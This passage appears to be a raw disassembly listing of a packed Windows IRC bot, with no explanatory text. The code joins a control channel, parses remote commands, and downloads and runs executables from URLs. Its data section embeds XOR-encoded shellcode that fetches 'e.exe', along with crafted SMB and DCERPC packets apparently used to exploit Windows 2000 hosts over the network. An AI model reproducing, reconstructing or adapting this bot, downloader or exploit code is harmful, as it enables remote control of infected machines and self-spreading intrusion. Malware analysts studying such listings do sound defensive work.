call sub_31501932
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_3150315E endp
; =============== S U B R O U T I N E =======================================
sub_315031C7 proc near ; CODE XREF: UPX0:315035AC�p
mov eax, offset loc_31503AA4
call sub_31503A78
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_315010C8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_31503202: ; CODE XREF: sub_315031C7+EF�j
call sub_31501A32
test eax, eax
jz short loc_3150324F
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31501164 ; select
cmp eax, 0FFFFFFFFh
jz short loc_3150324F
call sub_31501D75
test eax, eax
jz short loc_31503233
push 1
call dword_315010E0 ; ExitThread
loc_31503233: ; CODE XREF: sub_315031C7+62�j
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_31503262
mov ecx, esi
call sub_3150315E
loc_3150324F: ; CODE XREF: sub_315031C7+42�j
; sub_315031C7+59�j ...
xor eax, eax
loc_31503251: ; CODE XREF: sub_315031C7+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31503262: ; CODE XREF: sub_315031C7+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_315032CD
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_315010A4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_315036FD
cmp eax, ebx
jnz short loc_3150324F
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31501A32
test eax, eax
jz short loc_3150324F
push 64h
call dword_315010A4 ; Sleep
jmp loc_31503202
; ---------------------------------------------------------------------------
loc_315032BB: ; DATA XREF: UPX0:31503B1C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_315011A8 ; closesocket
mov eax, offset loc_315032CD
retn
; ---------------------------------------------------------------------------
loc_315032CD: ; CODE XREF: sub_315031C7+B2�j
; DATA XREF: sub_315031C7+100�o
push 1
pop eax
jmp loc_31503251
sub_315031C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315032D5 proc near ; CODE XREF: sub_315036FD+9C�p
; sub_315036FD+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_315010A0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlen
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlen
add ebx, eax
cmp ebx, 10Eh
jle short loc_31503304
push 1
pop eax
jmp short loc_31503345
; ---------------------------------------------------------------------------
loc_31503304: ; CODE XREF: sub_315032D5+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
push 64h
call dword_315010A4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3150119C ; send
xor eax, eax
loc_31503345: ; CODE XREF: sub_315032D5+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_315032D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150334C proc near ; CODE XREF: UPX0:3150345F�p
var_24 = qword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
call dword_31501050 ; GetSystemTime
movzx eax, [ebp+var_1A]
mov [ebp+var_4], eax
push ecx
fild [ebp+var_4]
push ecx
fstp [esp+24h+var_24]
call sub_31503A8A ; atan
movzx eax, [ebp+var_16]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A84 ; sin
movzx eax, [ebp+var_1C]
fmul [ebp+var_C]
lea eax, [eax+eax*2]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A7E ; cos
fadd [ebp+var_C]
fstp [ebp+var_C]
push dword ptr [ebp+var_C]
call dword_31501128 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31501932
push 8
push [ebp+arg_4]
call sub_31501932
add esp, 1Ch
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_315018BA
leave
retn
sub_3150334C endp
; ---------------------------------------------------------------------------
loc_315033E3: ; DATA XREF: sub_31501D89+128�o
mov eax, offset loc_31503ABB
call sub_31503A78
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov ds:dword_31506194, ebx
call sub_315018BA
mov esi, dword_31501124
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31501932
cmp ds:dword_31506190, ebx
mov edi, dword_3150106C
pop ecx
pop ecx
jz short loc_31503438
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcat
loc_31503438: ; CODE XREF: UPX0:3150342B�j
lea eax, [ebp-4Ch]
push offset a13 ; "13"
push eax
call edi ; lstrcat
lea ecx, [ebp-2F4h]
call sub_31502D7C
mov [ebp-4], ebx
loc_31503451: ; CODE XREF: UPX0:315035B8�j
; UPX0:315035DE�j
push offset dword_31506198
lea eax, [ebp-18h]
push offset dword_3150619C
push eax
call sub_3150334C
add esp, 0Ch
loc_31503467: ; CODE XREF: UPX0:3150347B�j
call sub_31501A32
test eax, eax
jnz short loc_3150347D
push 3E8h
call dword_315010A4 ; Sleep
jmp short loc_31503467
; ---------------------------------------------------------------------------
loc_3150347D: ; CODE XREF: UPX0:3150346E�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31501932
pop ecx
xor edi, edi
pop ecx
loc_31503498: ; CODE XREF: UPX0:315034D4�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31505E04
call sub_31502D91
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DC7
test eax, eax
jz short loc_3150352B
inc edi
cmp edi, 8
jl short loc_31503498
xor edi, edi
loc_315034D8: ; CODE XREF: UPX0:31503527�j
call sub_31501A32
test eax, eax
jz short loc_31503539
push 1A0Bh
call esi ; rand
push 13h
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31505E04[edx*4]
call sub_31502D91
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DC7
test eax, eax
jz short loc_31503536
inc edi
cmp edi, 4Ch
jb short loc_315034D8
jmp short loc_31503539
; ---------------------------------------------------------------------------
loc_3150352B: ; CODE XREF: UPX0:315034CE�j
push 1
pop ebx
mov ds:dword_31506194, ebx
jmp short loc_31503542
; ---------------------------------------------------------------------------
loc_31503536: ; CODE XREF: UPX0:31503521�j
push 1
pop ebx
loc_31503539: ; CODE XREF: UPX0:315034DF�j
; UPX0:31503529�j
cmp ds:dword_31506194, 0
jz short loc_31503551
loc_31503542: ; CODE XREF: UPX0:31503534�j
lea eax, [ebp-18h]
push offset aTaty ; "#taty"
push eax
call dword_31501088 ; lstrcpy
loc_31503551: ; CODE XREF: UPX0:31503540�j
test ebx, ebx
jz short loc_315035C9
call sub_31501A32
test eax, eax
jz short loc_315035C9
loc_3150355E: ; CODE XREF: UPX0:31503583�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_3150308C
test eax, eax
jz short loc_31503585
push 3E8h
call dword_315010A4 ; Sleep
call sub_31501A32
test eax, eax
jnz short loc_3150355E
loc_31503585: ; CODE XREF: UPX0:3150356F�j
cmp ds:dword_31506194, 0
jz short loc_31503595
mov edx, 0A8C0h
jmp short loc_315035A5
; ---------------------------------------------------------------------------
loc_31503595: ; CODE XREF: UPX0:3150358C�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_315035A5: ; CODE XREF: UPX0:31503593�j
push edx
lea ecx, [ebp-2F4h]
call sub_315031C7
call sub_31501A32
test eax, eax
jz loc_31503451
lea ecx, [ebp-2F4h]
call sub_3150315E
loc_315035C9: ; CODE XREF: UPX0:31503553�j
; UPX0:3150355C�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_315010A4 ; Sleep
jmp loc_31503451
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315035E3 proc near ; CODE XREF: sub_315036FD+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31501154 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_3150360E
push 1
jmp loc_315036A4
; ---------------------------------------------------------------------------
loc_3150360E: ; CODE XREF: sub_315035E3+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31501068 ; GetSystemDirectoryA
mov edi, dword_3150106C
lea eax, [ebp+var_110]
push offset asc_31505CE0 ; "\\"
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_315010A0 ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_31501932
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcat
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_315010EC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31503684
push 2
jmp short loc_315036A4
; ---------------------------------------------------------------------------
loc_31503684: ; CODE XREF: sub_315035E3+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31501150 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_315036A7
push [ebp+var_4]
call dword_315010BC ; CloseHandle
push 3
loc_315036A4: ; CODE XREF: sub_315035E3+26�j
; sub_315035E3+9F�j
pop eax
jmp short loc_315036F8
; ---------------------------------------------------------------------------
loc_315036A7: ; CODE XREF: sub_315035E3+B4�j
mov edi, 100000h
push edi
call sub_315027DB
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31501158 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3150104C ; WriteFile
push [ebp+var_4]
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31501962
push ebx
call sub_315027EF
add esp, 0Ch
xor eax, eax
loc_315036F8: ; CODE XREF: sub_315035E3+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_315035E3 endp
; =============== S U B R O U T I N E =======================================
sub_315036FD proc near ; CODE XREF: sub_315031C7+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_3150619C
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
mov edi, dword_315010C8
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_3150373C
and dword ptr [esi+284h], 0
loc_3150373C: ; CODE XREF: sub_315036FD+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_3150379E
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_3150379E
lea eax, [esi+180h]
push eax
call sub_315035E3
test eax, eax
pop ecx
jnz short loc_3150379E
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032D5
loc_3150379E: ; CODE XREF: sub_315036FD+43�j
; sub_315036FD+55�j ...
test ebx, ebx
jz loc_315039DC
push ebx
call dword_315010A0 ; lstrlen
cmp eax, 0Ah
jle loc_315039DC
mov ebp, dword_31501110
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_315039DC
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlen
cmp eax, 100h
jge loc_31503A03
push ds:dword_31506198
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31502D17
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_315039DC
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlen
cmp eax, 100h
jge loc_31503A03
push ds:dword_31506198
lea eax, [esi+180h]
push ebx
push eax
call sub_31502D17
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31501040 ; lstrcmp
mov ebx, dword_31501088
test eax, eax
jnz loc_31503943
lea eax, [esi+180h]
push eax
call dword_315010A0 ; lstrlen
cmp eax, 0FFh
jge loc_31503943
cmp dword ptr [esi+284h], 0
jnz loc_31503943
cmp dword ptr [esi+7Ch], 0
jnz loc_31503943
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_31503924
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_315010A0 ; lstrlen
cmp eax, 100h
jge loc_31503A03
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx ; lstrcpy
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpy
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 65h
jle short loc_31503931
lea eax, [esp+2DCh+var_FF]
push eax
call dword_315010F8 ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_31503931
cmp ebp, 0E10h
jnb short loc_31503931
call dword_31501124 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_315010C8 ; GetTickCount
mov [esi+74h], eax
jmp short loc_31503931
; ---------------------------------------------------------------------------
loc_31503924: ; CODE XREF: sub_315036FD+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpy
loc_31503931: ; CODE XREF: sub_315036FD+1E9�j
; sub_315036FD+1FE�j ...
lea eax, [esi+80h]
push offset asc_31506114 ; "|"
push eax
call dword_3150106C ; lstrcat
loc_31503943: ; CODE XREF: sub_315036FD+15A�j
; sub_315036FD+172�j ...
mov ebp, dword_31501040
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp ; lstrcmp
test eax, eax
jnz short loc_315039B9
lea eax, [esp+2DCh+var_2C8]
push offset dword_315061BC
push eax
call ebx ; lstrcpy
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31501040+4
push ds:dword_31506188
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31506184
push ds:dword_3150614C
push offset aDD13SD ; "%d,%d,13%s,%d"
push eax
call dword_3150113C ; wsprintfA
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032D5
loc_315039B9: ; CODE XREF: sub_315036FD+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp ; lstrcmp
test eax, eax
jnz short loc_315039D9
cmp [esi+284h], eax
jz short loc_315039D9
push 1
pop eax
jmp short loc_31503A05
; ---------------------------------------------------------------------------
loc_315039D9: ; CODE XREF: sub_315036FD+2CD�j
; sub_315036FD+2D5�j
mov byte ptr [edi], 7Ch
loc_315039DC: ; CODE XREF: sub_315036FD+A3�j
; sub_315036FD+B3�j ...
cmp dword ptr [esi+284h], 0
jz short loc_31503A03
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503A03
call dword_31501124 ; rand
loc_31503A03: ; CODE XREF: sub_315036FD+E2�j
; sub_315036FD+123�j ...
xor eax, eax
loc_31503A05: ; CODE XREF: sub_315036FD+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_315036FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A12 proc near ; CODE XREF: sub_315011C0+128�p
; sub_315011C0+134�p ...
jmp dword_31501134
sub_31503A12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A18 proc near ; CODE XREF: sub_315011C0+9C�p
; sub_315011C0+C5�p ...
jmp dword_31501130
sub_31503A18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A1E proc near ; CODE XREF: sub_315011C0+93�p
; sub_315011C0+B2�p ...
jmp dword_3150112C
sub_31503A1E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31503A30 proc near ; CODE XREF: sub_315011C0+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31503A50
loc_31503A3C: ; CODE XREF: sub_31503A30+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31503A3C
loc_31503A50: ; CODE XREF: sub_31503A30+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31503A30 endp
; ---------------------------------------------------------------------------
align 10h
loc_31503A60: ; DATA XREF: sub_31501D89+A�o
jmp dword ptr loc_3150111C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A66 proc near ; CODE XREF: sub_31501F46+10C�p
; sub_31501F46+119�p ...
jmp dword_31501118
sub_31503A66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A6C proc near ; CODE XREF: sub_31501F46+35�p
jmp dword_31501114
sub_31503A6C endp
; ---------------------------------------------------------------------------
loc_31503A72: ; CODE XREF: UPX0:31503AA9�j
; UPX0:31503AC0�j
jmp dword ptr locret_3150110A+2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A78 proc near ; CODE XREF: sub_315031C7+5�p
; UPX0:315033E8�p
jmp dword ptr loc_31501108
sub_31503A78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A7E proc near ; CODE XREF: sub_3150334C+4F�p
jmp dword_31501104
sub_31503A7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A84 proc near ; CODE XREF: sub_3150334C+34�p
jmp dword_31501100
sub_31503A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A8A proc near ; CODE XREF: sub_3150334C+1F�p
jmp dword_315010FC
sub_31503A8A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A90 proc near ; CODE XREF: sub_3150246B+AB�p
jmp dword_31501084
sub_31503A90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A96 proc near ; CODE XREF: sub_3150246B+64�p
jmp dword_3150107C
sub_31503A96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A9C proc near ; CODE XREF: sub_3150246B+2D�p
jmp dword_31501078
sub_31503A9C endp
; ---------------------------------------------------------------------------
align 4
loc_31503AA4: ; DATA XREF: sub_315031C7�o
mov eax, offset dword_31503AC8
jmp loc_31503A72
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-2F4h]
jmp loc_31502DAF
; ---------------------------------------------------------------------------
loc_31503ABB: ; DATA XREF: UPX0:loc_315033E3�o
mov eax, offset dword_31503B20
jmp loc_31503A72
; ---------------------------------------------------------------------------
align 4
dword_31503AC8 dd 19930520h, 2, 31503AE8h, 1, 31503AF8h, 3 dup(0)
; DATA XREF: UPX0:loc_31503AA4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31503B10h, 4 dup(0)
dd offset loc_315032BB
dword_31503B20 dd 19930520h, 1, 31503B40h, 5 dup(0) ; DATA XREF: UPX0:loc_31503ABB�o
dd 0FFFFFFFFh, 31503AB0h, 52Eh dup(0)
byte_31505000 db 0EBh ; DATA XREF: sub_315011C0+24E�o
; sub_315011C0+260�o ...
db 58h
word_31505002 dw 7468h ; DATA XREF: sub_31502252+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EFB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C371C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B271C999h
dd 99C99998h, 0E3F367C9h, 0DF1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A00414D9h, 99C99998h
dd 9171CAC9h, 99C99998h, 61688DC9h, 0AC1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992471h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993A71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DF2Ch, 0C9C999C9h, 0C9991171h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DF2C66CBh, 99C99998h, 0AC2C66C9h
dd 99C99998h, 990A71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ACh, 1A71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A00414h, 0C999C999h, 99E871CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FF71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 0C999F0AAh, 2 dup(0C999C999h)
dd 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 6 dup(0C999C999h)
dd 0F5CAC999h, 99E9FCFCh, 0EBFCF2C9h, 0AAF5FCF7h, 0C7C999ABh
dd 59AAF934h, 2A2A25B4h, 93ACC966h, 0C9B78190h, 639D909Ch
dd 71CDC983h, 99C99992h, 0BFC999C9h, 14513519h, 0A95BDFDh
dd 34C79172h, 99C871F9h, 99C999C9h, 0A5D212C9h, 0E180D512h
dd 6FAA529Ah, 9A2A8D14h, 8B12B9C8h, 59AA4A9Ah, 0AB9E5958h
dd 0A319DB9Bh, 6CECC999h, 85BDDDA2h, 0A2DF9EEDh, 44EB81E8h
dd 0BDC81255h, 2E964A9Ah, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 85BDDD10h, 0D31C10F8h, 99C99998h, 664966C9h, 12FEFD7Fh
dd 0C999A987h, 1295C212h, 821285C2h, 5A91C212h, 0FDF7FCB7h
dd 0B7h
dword_315052C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_315011C0+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31505354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31505400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_315054E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_315011C0+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31505544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_315055B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31505654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_315056D4 dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_315011C0+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
